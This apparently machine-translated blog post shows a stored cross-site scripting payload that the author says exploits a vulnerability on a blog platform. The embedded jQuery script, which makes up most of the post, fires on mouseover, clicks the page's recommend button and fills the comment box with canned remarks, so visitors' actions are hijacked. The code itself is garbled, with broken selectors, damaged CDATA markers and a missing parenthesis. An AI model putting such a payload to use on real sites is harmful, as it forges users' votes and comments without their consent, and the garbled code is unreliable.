Jquery is really an artifact. Let's test the Vulnerability I found here!
So here we will fill in some irrelevant things, for example, I put that JavaScript here:
<SCRIPT type = "text/JavaScript"> // <! [CDATA [$ (function () {$ ("# Content "). mouseover (function () {; $ ("Div [class = diggit]"). trigger ('click'); $ ("textarea [class = comment_textarea]"). val ("this is the case. What the landlord said is true! "+ Math. random ();}); $ ("input [name = commentbutton1]"). mouseover (function () {$ ("Div [class = diggit]"). trigger ('click'); $ ("textarea [class = comment_textarea]"). val ("this article is good and worth recommending! ") ;;}); $ (" Input [name = commentbutton2] "). mouseover (function () {; $ ("textarea [class = comment_textarea]"). val ("coming soon Article , Follow! ") ;;}); $ (" Input [name = commentbutton3] "). mouseover (function () {$ ("textarea [class = comment_textarea]"). val ("continue to work hard, come on! ") ;;}); $ (" Input [name = commentbutton4] "). mouseover (function () {$ ("textarea [class = comment_textarea]"). val ("not totally agreed, controversial! ") ;;}); $ (" Input [name = commentbutton5] "). mouseover (function () {$ ("textarea [class = comment_textarea]"). val ("disagree with the landlord's point of view! ") ;;}); $ (" Input [name = commentbutton6] "). mouseover (function () {$ ("textarea [class = comment_textarea]"). val ("float ~~ ");}); //]> </SCRIPT>
This article mainly aims to see the effect without being malicious.
Reprinted please indicate the source : Www.cnblogs.com/dsharp
Welcome to join us
Feedback on Article quality, you can comment through the quick channel: